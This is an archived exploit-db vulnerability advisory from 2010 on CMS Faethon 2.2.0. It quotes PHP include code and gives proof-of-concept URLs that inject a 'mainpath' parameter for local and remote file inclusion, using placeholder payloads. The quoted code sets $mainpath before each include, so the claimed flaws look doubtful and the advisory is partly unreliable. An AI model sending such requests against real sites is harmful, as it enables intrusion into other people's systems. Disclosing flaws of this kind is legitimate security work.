CmsFaethon 2.2.0 (ultimate.7z) – Multiple Vulnerabilities

  • 作者: eidelweiss
    日期: 2010-03-26
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/11894/
  • #####################################################################################
    	cmsfaethon-2.2.0-ultimate.7z Multiple Vulnerability
    #####################################################################################
    
    [+]Vendor: 	CMS Faethon
    [+]Version: 	2.2.0-ultimate.7z
    [+]License: 	GNU GENERAL PUBLIC LICENSE
    [+]Download:	http://sourceforge.net/projects/cmsfaethon/files/
    [+]Risk: 	High
    [+]Remote:	Yes
    [+]Local:	Yes
    [+]Vulnerable:	Since v1.12
    		CMS Faethon 1.3 (CMS Faethon 1.3-Ultimed tocmsfaethon-1.3.5-ultimate.7z)
    		CMS Faethon 2.0 (cmsfaethon-2.0-ultimate.7 to CMS Faethon 2.0.5 Blog Edition )
    		CMS Faethon 2.2.0 Ultimate
    		
    ###########################################################
    [+]Author:	eidelweiss
    [+]Contact:	eidelweiss[at]cyberservices[dot]com
    [+]Date:	March 26 2010 (published march 27)
    [+]Thank`s:	sp3x (securityreason) - JosS (hack0wn) - r0073r & 0x1D (inj3ct0r)
    [+]Special:	[D]eal [C]yber - syabilla_putri (i miss u to) 
    ###########################################################
    
    ####################
    
    
    -=[Description]=-
    
    
    CMS Faethon is content management system for different web pages.
    
    	CMS Faethon 2.2
    	
    	This program is free software; you can redistribute it and/or
    	modify it under the terms of the GNU General Public License
    	as published by the Free Software Foundation; either version 2
    	of the License, or (at your option) any later version.
    
    ####################
    
    -=[ VULN & =[P0C]= C0de ]=-
    
    ####################
    	$File: admin/index.php
    ####################
    
    ***/
    
    session_start();
    $mainpath = "./";
    include($mainpath .'../lib/functions_SQL.php'); 
    include($mainpath .'../lib/functions_DATE.php');
    include($mainpath .'../lib/class_multilang.php');
    include($mainpath .'../lib/class_menu.php');
    if($_GET['cmd'] != 'acp' || ($_GET['cmd'] == 'acp' && isset($_SESSION['auth_key']))) {
    	include($mainpath .'header.php');
    } else {
    	include($mainpath .'config.php'); // possible Lfi here
    	include($mainpath .'auth.php');
    }
    
    ####################
    	$File: mobile/index.php
    ####################
    
    
    require('../config.php');
    include('../lang/'.$cfg['lang'].'.inc');
    $mainpath = "./";
    $title = "Titulní strana";
    include($mainpath . 'header.php');
    
    ####################
    	$File: admin/articles/edit.php
    ####################
    
    if(!isset($_GET['cmd'])) { 
    	$mainpath = "../"; 
    	include($mainpath . '../lib/functions_SQL.php');
    	include($mainpath . 'header.php') ;
    
    
    -=[P0C]=-
    
    	http://127.0.0.1/[cms_faethon_path]/admin/index.php?mainpath=[LFI]%00
    	
    	http://127.0.0.1/[cms_faethon_path]/admin/articles/edit.php?mainpath=[RFI]
    
    	http://127.0.0.1/[cms_faethon_path]/mobile/index.php?mainpath=[RFI]
    	
    	etc,etc,etc !!!
    
    	so many vulnerability in this project 
    	(I also saw possibility Directory Traversal vulnerability , use your skill and play your imaginasion)
    
    
    ###########################################################=[E0F]=###########################################################